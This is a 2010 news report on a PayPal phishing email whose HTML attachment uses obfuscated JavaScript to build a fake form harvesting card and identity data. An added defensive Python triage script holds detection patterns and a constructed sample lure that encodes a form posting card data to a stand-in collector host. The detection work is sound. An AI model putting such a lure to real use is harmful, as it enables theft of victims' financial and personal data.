Nov 16, 2010 09:56 GMT

German antivirus vendor Avira has intercepted a new phishing campaign, which generates fake emails posing as security notifications from PayPal.

The rogue emails carry the subject line "Notification Of Limited Account Access RXI034" (the final ID can differ) and purport to originate from a [email protected] address.

The contained message is well formulated and instructs recipients to open the attached .html file in order to provide account verification information.

Part of the message, allegedly signed by the PayPal Review Department, reads as follows:

"Dear Member,

As part of our efforts to provide a safe and secure environment for the online community, we regularly screen account activity.

Our review of you account has identified an issue regarding its safe use. We have placed a restriction on your account as a precaution.

To lift the restriction we will require some further information from you. […]

We have sent you an attachment which contains all the necessary steps in order to restore your account access. Download and open it in your browser."

Unlike most HTML attachments encountered in spam, this particular file is not a script that redirects to an external URL.

Instead, the document contains highly obfuscated JavaScript code, which generates a "Profile Update" page that mimics the appearance of the PayPal site.

The page displays a form which asks for a wealth of information ranging from personal and credit card details to employer and mother's maiden names.

According to Sorin Mustaca, a data security expert at Avira, form data is sent to a processing script hosted on a third-party domain, which performs some basic checks before storing it.

For example, the researcher notes that he was able to input a bogus Visa credit card number only after using a sequence of 16 digits that started with 4.
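The attachment pattern described above (an HTML file that is almost entirely script, builds its form at runtime and posts it to a third-party host) can be flagged statically at a mail gateway. The Python below is an added example, not code from Avira or from the original article; the indicator regexes, the 0.7 threshold, the single percent-decoding layer, the function names and every hostname are assumptions, and the sample message is constructed.

```python
import re
from email import message_from_string
from email.message import EmailMessage
from urllib.parse import unquote

# Illustrative heuristics (assumptions), not a vendor signature set.
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
DECODER = re.compile(r"\b(?:eval|unescape|atob|String\.fromCharCode|document\.write)\s*\(")
FORM = re.compile(r"<form\b[^>]*\baction\s*=\s*[\"']?https?://([^/\"'\s>]+)", re.I)

def triage_html(html):
    """Return the list of indicators that fire for one HTML attachment."""
    hits = []
    scripts = "".join(SCRIPT.findall(html))
    if html and len(scripts) / len(html) > 0.7:
        hits.append("script-only document")
    if DECODER.search(scripts):
        hits.append("runtime decoder call")
    # Peel one percent-encoding layer; heavier obfuscation needs dynamic analysis.
    match = FORM.search(unquote(scripts))
    if match:
        hits.append("hidden form posts to " + match.group(1))
    return hits

def triage_message(raw):
    """Map each HTML attachment's filename to the indicators it triggers."""
    results = {}
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html" and part.get_filename():
            html = part.get_payload(decode=True).decode("utf-8", "replace")
            results[part.get_filename()] = triage_html(html)
    return results

def build_sample():
    """Constructed message imitating the described lure; all values are made up."""
    form = '<form action="http://collector.example/save.php" method="post"><input name="card"></form>'
    encoded = "".join("%%%02X" % b for b in form.encode())
    html = '<html><script>document.write(unescape("%s"));</script></html>' % encoded
    msg = EmailMessage()
    msg["Subject"] = "Notification Of Limited Account Access RXI034"
    msg["From"] = "sender@phish.example"
    msg["To"] = "user@mail.example"
    msg.set_content("Download and open the attachment in your browser.")
    msg.add_attachment(html, subtype="html", filename="restore.html")
    return msg.as_string()

if __name__ == "__main__":
    print(triage_message(build_sample()))
```

Only the first two indicators fire when the payload is wrapped in more than one encoding layer, which is why they are reported separately from the decoded form target.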

A recent Avira report revealed that PayPal remains the most phished brand on the Internet and accounted for 57.25% of all such attacks detected last month.
